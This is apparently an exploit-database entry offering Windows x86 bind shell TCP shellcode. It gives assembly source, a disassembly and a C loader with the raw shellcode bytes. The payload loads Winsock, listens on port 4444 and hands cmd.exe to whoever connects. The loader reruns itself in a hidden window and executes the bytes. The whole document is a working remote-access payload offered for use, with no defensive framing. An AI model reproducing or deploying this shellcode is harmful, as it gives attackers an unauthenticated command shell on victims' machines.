Windows x86 - Bind Shell TCP Shellcode



EKU-ID: 5842 CVE: OSVDB-ID:
Author: Roziul Hasan Khan Shifat Published: 2016-09-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


/*
    # Title : Windows x86 bind shell tcp shellcode
    # Author : Roziul Hasan Khan Shifat
    # Date : 08-09-2016
    # Tested On : Windows 7 Ultimate , Starter x86
*/
 
//Note: This shellcode will only works on x86
 
/*
section .text
    global _start
_start:
 
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB.Ldr
mov esi,[eax+0x14] ;PEB.Ldr->InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
mov edi,[eax+0x10] ;kernel32.dll base address
 
 
mov ebx,[edi+0x3c] ;DOS->elf_anew
add ebx,edi ;PE HEADER
mov ebx,[ebx+0x78]
add ebx,edi ;kernel32 IMAGE_EXPORT_DIRECTORY
 
 
sub esp,32
lea esi,[esp]
 
 
mov cx,660
 
mov edx,[ebx+0x1c] ;AddressOfFunctions
add edx,edi
 
mov eax,[edx+ecx]
add eax,edi
 
mov [esi],dword eax ;CreateProcessA() at offset 0
 
mov cx,1128
 
mov eax,[edx+ecx]
add eax,edi
 
mov [esi+4],dword eax ;ExitProcess() at offset 4
 
;------------------------------------
;finding base address of ws2_32.dll
 
mov cx,3312
 
mov eax,[edx+ecx]
add eax,edi
 
xor ecx,ecx
push 0x41416c6c
mov [esp+2],word cx
push 0x642e3233
push 0x5f327377
 
lea ebx,[esp]
 
push ebx
call eax
 
;---------------------------
mov edi,eax
;---------------------
mov ebx,[edi+0x3c] ;DOS->elf_anew
add ebx,edi ;PE HEADER
mov ebx,[ebx+0x78]
add ebx,edi ; ws2_32.dll IMAGE_EXPORT_DIRECTORY
 
mov edx,[ebx+0x1c] ;AddressOfFunctions
add edx,edi
 
xor ecx,ecx
mov cx,456
 
mov eax,[edx+ecx]
add eax,edi
 
mov [esi+8],dword eax ;WSAStartup() at offset 8
 
mov cx,392
 
mov eax,[edx+ecx]
add eax,edi
 
mov [esi+12],dword eax ;WSASocketA() at offset 12
 
 
mov eax,[edx+4]
add eax,edi
 
mov [esi+16],dword eax ;bind() at offset 16
 
mov eax,[edx+48]
add eax,edi
 
mov [esi+20],dword eax ;listen() at offset 20
 
mov eax,[edx]
add eax,edi
 
mov [esi+24],dword eax ;accept() at offset 24
 
mov eax,[edx+80]
add eax,edi
 
mov [esi+28],dword eax ;setsockopt() at offset 28
;-------------------------------------------------
;WSAStartup(514, &WSADATA)
mov cx,400
sub esp,ecx
 
lea ebx,[esp]
 
mov cx,514
 
push ebx
push ecx
 
call dword [esi+8]
 
 
;-----------------------------------------
;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)
 
xor ecx,ecx
 
push ecx
push ecx
push ecx
 
mov cl,6
push ecx
 
sub ecx,5
push ecx
 
inc ecx
push ecx
 
call dword [esi+12]
;----------------------------
mov edi,eax ;SOCKET
 
;----------------------------------
;setsockopt(sock,0xffff,4,&int l=1,int j=2)
 
cdq
mov dl,2
 
push edx
dec edx
 
push edx
lea ecx,[esp]
 
mov dl,4
 
push ecx
push edx
 
mov dx,0xffff
push edx
push edi
 
call dword [esi+28]
 
 
;--------------------------------------------
;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16);
 
cdq
 
push edx
push edx
push edx
push edx
 
mov [esp],byte 2
mov [esp+2],word 0x5c11 ;port 4444
 
lea ecx,[esp]
mov dl,16
 
push edx
push ecx
push edi
 
call dword [esi+16]
 
;--------------------------------
;listen(SOCKET,1);
cdq
inc edx
push edx
push edi
 
call dword [esi+20]
;-----------------------------
;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,&16);
 
cdq
push edx
push edx
push edx
push edx
mov dl,16
lea ecx,[esp]
 
 
 
push edx
lea ebx,[esp]
 
push ebx
push ecx
push edi
 
call dword [esi+24]
;-----------------------
mov edi,eax ;CLIent socket
;-----------------------
 
cdq
sub esp,16
lea ebx,[esp] ;PROCESS_INFORMATION
 
push edi
push edi
push edi
push edx
 
push edx
 
mov dl,255
inc edx
 
push edx
cdq
 
push edx
push edx
push edx
push edx
push edx
 
push edx
push edx
push edx
push edx
push edx
 
mov dl,68
push edx
 
lea ecx,[esp] ;STARTUPINFOA
 
cdq
push 0x41657865
mov [esp+3],byte dl
push 0x2e646d63
 
lea eax,[esp]
 
;---------------------------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFORMATION)
 
push ebx
push ecx
 
push edx
push edx
push edx
 
inc edx
push edx
cdq
 
push edx
push edx
 
push eax
push edx
 
call dword [esi]
;-----------------------
push eax
call dword [esi+4]
 
*/
 
 
/*
 
Disassembly of section .text:
 
00000000 <_start>:
   0:   31 c9                   xor    %ecx,%ecx
   2:   64 8b 41 30             mov    %fs:0x30(%ecx),%eax
   6:   8b 40 0c                mov    0xc(%eax),%eax
   9:   8b 70 14                mov    0x14(%eax),%esi
   c:   ad                      lods   %ds:(%esi),%eax
   d:   96                      xchg   %eax,%esi
   e:   ad                      lods   %ds:(%esi),%eax
   f:   8b 78 10                mov    0x10(%eax),%edi
  12:   8b 5f 3c                mov    0x3c(%edi),%ebx
  15:   01 fb                   add    %edi,%ebx
  17:   8b 5b 78                mov    0x78(%ebx),%ebx
  1a:   01 fb                   add    %edi,%ebx
  1c:   83 ec 20                sub    $0x20,%esp
  1f:   8d 34 24                lea    (%esp),%esi
  22:   66 b9 94 02             mov    $0x294,%cx
  26:   8b 53 1c                mov    0x1c(%ebx),%edx
  29:   01 fa                   add    %edi,%edx
  2b:   8b 04 0a                mov    (%edx,%ecx,1),%eax
  2e:   01 f8                   add    %edi,%eax
  30:   89 06                   mov    %eax,(%esi)
  32:   66 b9 68 04             mov    $0x468,%cx
  36:   8b 04 0a                mov    (%edx,%ecx,1),%eax
  39:   01 f8                   add    %edi,%eax
  3b:   89 46 04                mov    %eax,0x4(%esi)
  3e:   66 b9 f0 0c             mov    $0xcf0,%cx
  42:   8b 04 0a                mov    (%edx,%ecx,1),%eax
  45:   01 f8                   add    %edi,%eax
  47:   31 c9                   xor    %ecx,%ecx
  49:   68 6c 6c 41 41          push   $0x41416c6c
  4e:   66 89 4c 24 02          mov    %cx,0x2(%esp)
  53:   68 33 32 2e 64          push   $0x642e3233
  58:   68 77 73 32 5f          push   $0x5f327377
  5d:   8d 1c 24                lea    (%esp),%ebx
  60:   53                      push   %ebx
  61:   ff d0                   call   *%eax
  63:   89 c7                   mov    %eax,%edi
  65:   8b 5f 3c                mov    0x3c(%edi),%ebx
  68:   01 fb                   add    %edi,%ebx
  6a:   8b 5b 78                mov    0x78(%ebx),%ebx
  6d:   01 fb                   add    %edi,%ebx
  6f:   8b 53 1c                mov    0x1c(%ebx),%edx
  72:   01 fa                   add    %edi,%edx
  74:   31 c9                   xor    %ecx,%ecx
  76:   66 b9 c8 01             mov    $0x1c8,%cx
  7a:   8b 04 0a                mov    (%edx,%ecx,1),%eax
  7d:   01 f8                   add    %edi,%eax
  7f:   89 46 08                mov    %eax,0x8(%esi)
  82:   66 b9 88 01             mov    $0x188,%cx
  86:   8b 04 0a                mov    (%edx,%ecx,1),%eax
  89:   01 f8                   add    %edi,%eax
  8b:   89 46 0c                mov    %eax,0xc(%esi)
  8e:   8b 42 04                mov    0x4(%edx),%eax
  91:   01 f8                   add    %edi,%eax
  93:   89 46 10                mov    %eax,0x10(%esi)
  96:   8b 42 30                mov    0x30(%edx),%eax
  99:   01 f8                   add    %edi,%eax
  9b:   89 46 14                mov    %eax,0x14(%esi)
  9e:   8b 02                   mov    (%edx),%eax
  a0:   01 f8                   add    %edi,%eax
  a2:   89 46 18                mov    %eax,0x18(%esi)
  a5:   8b 42 50                mov    0x50(%edx),%eax
  a8:   01 f8                   add    %edi,%eax
  aa:   89 46 1c                mov    %eax,0x1c(%esi)
  ad:   66 b9 90 01             mov    $0x190,%cx
  b1:   29 cc                   sub    %ecx,%esp
  b3:   8d 1c 24                lea    (%esp),%ebx
  b6:   66 b9 02 02             mov    $0x202,%cx
  ba:   53                      push   %ebx
  bb:   51                      push   %ecx
  bc:   ff 56 08                call   *0x8(%esi)
  bf:   31 c9                   xor    %ecx,%ecx
  c1:   51                      push   %ecx
  c2:   51                      push   %ecx
  c3:   51                      push   %ecx
  c4:   b1 06                   mov    $0x6,%cl
  c6:   51                      push   %ecx
  c7:   83 e9 05                sub    $0x5,%ecx
  ca:   51                      push   %ecx
  cb:   41                      inc    %ecx
  cc:   51                      push   %ecx
  cd:   ff 56 0c                call   *0xc(%esi)
  d0:   89 c7                   mov    %eax,%edi
  d2:   99                      cltd  
  d3:   b2 02                   mov    $0x2,%dl
  d5:   52                      push   %edx
  d6:   4a                      dec    %edx
  d7:   52                      push   %edx
  d8:   8d 0c 24                lea    (%esp),%ecx
  db:   b2 04                   mov    $0x4,%dl
  dd:   51                      push   %ecx
  de:   52                      push   %edx
  df:   66 ba ff ff             mov    $0xffff,%dx
  e3:   52                      push   %edx
  e4:   57                      push   %edi
  e5:   ff 56 1c                call   *0x1c(%esi)
  e8:   99                      cltd  
  e9:   52                      push   %edx
  ea:   52                      push   %edx
  eb:   52                      push   %edx
  ec:   52                      push   %edx
  ed:   c6 04 24 02             movb   $0x2,(%esp)
  f1:   66 c7 44 24 02 11 5c    movw   $0x5c11,0x2(%esp)
  f8:   8d 0c 24                lea    (%esp),%ecx
  fb:   b2 10                   mov    $0x10,%dl
  fd:   52                      push   %edx
  fe:   51                      push   %ecx
  ff:   57                      push   %edi
 100:   ff 56 10                call   *0x10(%esi)
 103:   99                      cltd  
 104:   42                      inc    %edx
 105:   52                      push   %edx
 106:   57                      push   %edi
 107:   ff 56 14                call   *0x14(%esi)
 10a:   99                      cltd  
 10b:   52                      push   %edx
 10c:   52                      push   %edx
 10d:   52                      push   %edx
 10e:   52                      push   %edx
 10f:   b2 10                   mov    $0x10,%dl
 111:   8d 0c 24                lea    (%esp),%ecx
 114:   52                      push   %edx
 115:   8d 1c 24                lea    (%esp),%ebx
 118:   53                      push   %ebx
 119:   51                      push   %ecx
 11a:   57                      push   %edi
 11b:   ff 56 18                call   *0x18(%esi)
 11e:   89 c7                   mov    %eax,%edi
 120:   99                      cltd  
 121:   83 ec 10                sub    $0x10,%esp
 124:   8d 1c 24                lea    (%esp),%ebx
 127:   57                      push   %edi
 128:   57                      push   %edi
 129:   57                      push   %edi
 12a:   52                      push   %edx
 12b:   52                      push   %edx
 12c:   b2 ff                   mov    $0xff,%dl
 12e:   42                      inc    %edx
 12f:   52                      push   %edx
 130:   99                      cltd  
 131:   52                      push   %edx
 132:   52                      push   %edx
 133:   52                      push   %edx
 134:   52                      push   %edx
 135:   52                      push   %edx
 136:   52                      push   %edx
 137:   52                      push   %edx
 138:   52                      push   %edx
 139:   52                      push   %edx
 13a:   52                      push   %edx
 13b:   b2 44                   mov    $0x44,%dl
 13d:   52                      push   %edx
 13e:   8d 0c 24                lea    (%esp),%ecx
 141:   99                      cltd  
 142:   68 65 78 65 41          push   $0x41657865
 147:   88 54 24 03             mov    %dl,0x3(%esp)
 14b:   68 63 6d 64 2e          push   $0x2e646d63
 150:   8d 04 24                lea    (%esp),%eax
 153:   53                      push   %ebx
 154:   51                      push   %ecx
 155:   52                      push   %edx
 156:   52                      push   %edx
 157:   52                      push   %edx
 158:   42                      inc    %edx
 159:   52                      push   %edx
 15a:   99                      cltd  
 15b:   52                      push   %edx
 15c:   52                      push   %edx
 15d:   50                      push   %eax
 15e:   52                      push   %edx
 15f:   ff 16                   call   *(%esi)
 161:   50                      push   %eax
 162:   ff 56 04                call   *0x4(%esi)
*/
 
 
#include<windows.h>
#include<stdio.h>
#include<shellapi.h>
#include<stdlib.h>
 
char shellcode[]=\
 
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x78\x10\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x83\xec\x20\x8d\x34\x24\x66\xb9\x94\x02\x8b\x53\x1c\x01\xfa\x8b\x04\x0a\x01\xf8\x89\x06\x66\xb9\x68\x04\x8b\x04\x0a\x01\xf8\x89\x46\x04\x66\xb9\xf0\x0c\x8b\x04\x0a\x01\xf8\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x1c\x24\x53\xff\xd0\x89\xc7\x8b\x5f\x3c\x01\xfb\x8b\x5b\x78\x01\xfb\x8b\x53\x1c\x01\xfa\x31\xc9\x66\xb9\xc8\x01\x8b\x04\x0a\x01\xf8\x89\x46\x08\x66\xb9\x88\x01\x8b\x04\x0a\x01\xf8\x89\x46\x0c\x8b\x42\x04\x01\xf8\x89\x46\x10\x8b\x42\x30\x01\xf8\x89\x46\x14\x8b\x02\x01\xf8\x89\x46\x18\x8b\x42\x50\x01\xf8\x89\x46\x1c\x66\xb9\x90\x01\x29\xcc\x8d\x1c\x24\x66\xb9\x02\x02\x53\x51\xff\x56\x08\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x0c\x89\xc7\x99\xb2\x02\x52\x4a\x52\x8d\x0c\x24\xb2\x04\x51\x52\x66\xba\xff\xff\x52\x57\xff\x56\x1c\x99\x52\x52\x52\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x11\x5c\x8d\x0c\x24\xb2\x10\x52\x51\x57\xff\x56\x10\x99\x42\x52\x57\xff\x56\x14\x99\x52\x52\x52\x52\xb2\x10\x8d\x0c\x24\x52\x8d\x1c\x24\x53\x51\x57\xff\x56\x18\x89\xc7\x99\x83\xec\x10\x8d\x1c\x24\x57\x57\x57\x52\x52\xb2\xff\x42\x52\x99\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\xb2\x44\x52\x8d\x0c\x24\x99\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x04\x24\x53\x51\x52\x52\x52\x42\x52\x99\x52\x52\x50\x52\xff\x16\x50\xff\x56\x04";
 
int main(int i,char *a[])
{
 
    int mode;
 
 
 
    if(i==1)
    mode=1;
    else
    mode=atoi(a[1]);
 
switch(mode)
{
    case 1:
    ShellExecute(NULL,NULL,a[0],"78",NULL,0);
    break;
 
    case 78:
    (* (int(*)())shellcode )();
    break;
 
    default:
    break;
}
 
 
return 0;
}